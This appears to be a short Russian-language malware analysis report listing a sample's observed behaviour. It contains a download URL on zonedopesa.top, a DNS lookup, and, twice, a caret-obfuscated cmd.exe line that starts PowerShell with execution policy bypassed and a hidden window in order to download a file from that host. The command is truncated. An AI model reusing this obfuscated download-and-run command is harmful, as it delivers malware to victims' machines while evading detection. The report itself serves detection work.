Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwE^R^s^Hel^L^.EXe^ -EXeCu^TioN^p^Olicy^ ByP^aSS -^N^OPRof^i^Le^ ^-^Wind^Ows^tYL^e hiDDEN ^(n^eW-OBJ^eC^T^ ^SYsteM.^N^et^.^wEbCLieNt).^d^oWnlOa^d^F^ILe('http://www.zoned...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^OwE^R^s^Hel^L^.EXe^ -EXeCu^TioN^p^Olicy^ ByP^aSS -^N^OPRof^i^Le^ ^-^Wind^Ows^tYL^e hiDDEN ^(n^eW-OBJ^eC^T^ ^SYsteM.^N^et^.^wEbCLieNt).^d^oWnlOa^d^F^ILe('http://www.zoned...' (со скрытым окном)